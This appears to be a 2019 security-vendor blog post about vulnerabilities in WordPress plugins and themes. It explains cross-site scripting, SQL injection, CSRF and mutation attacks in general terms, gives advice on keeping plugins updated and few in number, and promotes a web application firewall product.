16 Sep, 2019

More Than 230 Vulnerabilities in WordPress, Plugins and Themes in the First Half of 2019

WordPress is the world's most popular website software, making it the world's biggest target for attacks. The WordPress team works hard to catch and fix any issues, but there have been more than 230 vulnerabilities in plugins and themes so far this year.
WordPress is the world's most popular website software. That makes it the world's biggest target for attacks. The WordPress team works hard to catch and fix any vulnerabilities, so sites that stay up to date are generally safe as far as the core functionality goes. However, the vast majority of sites use one or more plugins, and they're an easier target.

Plugins come from many sources, some better than others at issuing security patches. Keeping plugins updated is a more complex job than updating the WordPress core. More than 230 vulnerabilities were reported in plugins and themes in the first half of 2019. Website security requires keeping all active plugins and themes updated. Ones that aren't needed or are no longer supported should be removed.

Downloading and installation should always come from a trusted source. The publisher's site is the surest source for an authentic, up-to-date copy. Sites such as WordPress.org, Code Canyon, and iThemes offer verified plugins. Less reliable sources could have outdated versions or even plugins that have been tampered with.
Cross-Site Scripting
The most common type of security vulnerability is one that allows cross-site scripting (XSS). An XSS attack tries to execute unauthorized JavaScript in the context of the targeted site. The term is also used for similar attacks with other kinds of scripting, such as Flash and ActiveX. JavaScript is by far the most common vector.

Rogue JavaScript can alter nearly anything on a page. It can add an iframe, injecting the contents of an outside page. It can alter existing elements, replace images, change text, and add links. It can even redirect the whole page to a malicious site that looks almost the same as the real one.

Cross-site scripting can trick or force the user into unwanted situations such as:

  • Downloading malware
  • Injecting fraudulent ads linking to dangerous sites
  • Redirection to a phishing or malware site
  • Altering links on the page
Browsers try to spot XSS and warn users about it. The warnings may save people from becoming victims, but when they see the warning, they'll leave the site and probably not come back. Malware detection on a site is likely to lead to blacklisting, and it can take days to get off the blacklist even after removing the dangerous content. The damage in reputation can be severe. If the underlying vulnerability isn't fixed, more attacks will follow.
Other Attacks
Vulnerabilities in plugins can expose a site to other kinds of attacks as well.

SQL injection consists of submitting database commands through deliberately malformed URL parameters and form fields. Any code that accepts form input needs to validate its inputs, but sometimes it fails to catch all injection attempts. A suitably crafted attack can delete data, change the database's content, or send confidential information back to the attacker.
Cross-site request forgeries (CSRF) try to make the site treat an anonymous request as one from a privileged account. A successful forgery can post spam comments, create an account for the attacker, or steal or change existing passwords.
Mutation attacks rely on differences in how browsers handle HTML. A page may be safe with the browsers it's been tested on, but not with other browsers, especially older ones. The attack may take advantage of computers and operating systems that can't upgrade to the latest version.
Keeping Plugins Updated
Some hosts will automatically download and install all updates for a site's plugins. In most cases, it's a manual procedure but not a difficult one. If there are plugins that need updates, the WordPress administrative page will show them. The main admin page will have a number in a circle next to "Plugins," indicating the number of plugins for which updates are available. Clicking on "Plugins" will list them individually and let the administrator update them.

It's always wise to back up the site before doing an update. While updating is almost always safe, occasionally installing the latest version will change the functionality. The site may not be able to do everything it did before, or it could even break completely. The choice is to roll back to before the update or to remove the troublesome plugin until a solution is available. Check the release notes to see what has to be done.

With some sites, it's necessary to download the plugin as a ZIP file and then upload it by FTP to the site's plugins directory. This happens when the hosting provider restricts file access in a way that keeps WordPress from updating itself. Doing it this way is a little harder but not an onerous task.

Administrators should check at least once a week for any plugins that need updating.
Keeping Plugins Lean
Site administrators shouldn't be afraid of installing useful plugins, but they should keep the number low and not install them just because they look interesting. Each one adds a small amount of risk and makes the job of updating harder.

It's often possible to add features using built-in widgets that don't require any plugins. They may not be as fancy as what the plugins offer, but they don't require any maintenance.

Use plugins if they add value to your site, but not otherwise. That way you'll keep them manageable.
Protection with ThreatSign
Because of its complexity and the large pool of plugins, WordPress will always have new vulnerabilities. Keeping a site up to date is vital.

Even with a strong updating policy, there are risks. Zero-day attacks can hit a site before the vulnerability is general knowledge. Once a vulnerability is publicized, there's always some window of time between the announcement and the availability of a fix.

The ThreatSign Web Application Firewall from Quttera monitors traffic to your WordPress or PHP website, filtering out malicious requests. It protects against the exploitation of vulnerabilities before a patch is available. It uses the latest threat intelligence to update its protective measures. Cross-site scripting attempts and SQL injection will be stopped before they can reach the server.

Website security requires protection at multiple levels. No single measure can stop every attack. The combination of the ThreatSign WAF and the diligent maintenance of the site's software will keep the large majority of attacks from doing any damage. The result is higher uptime levels and greater safety for users.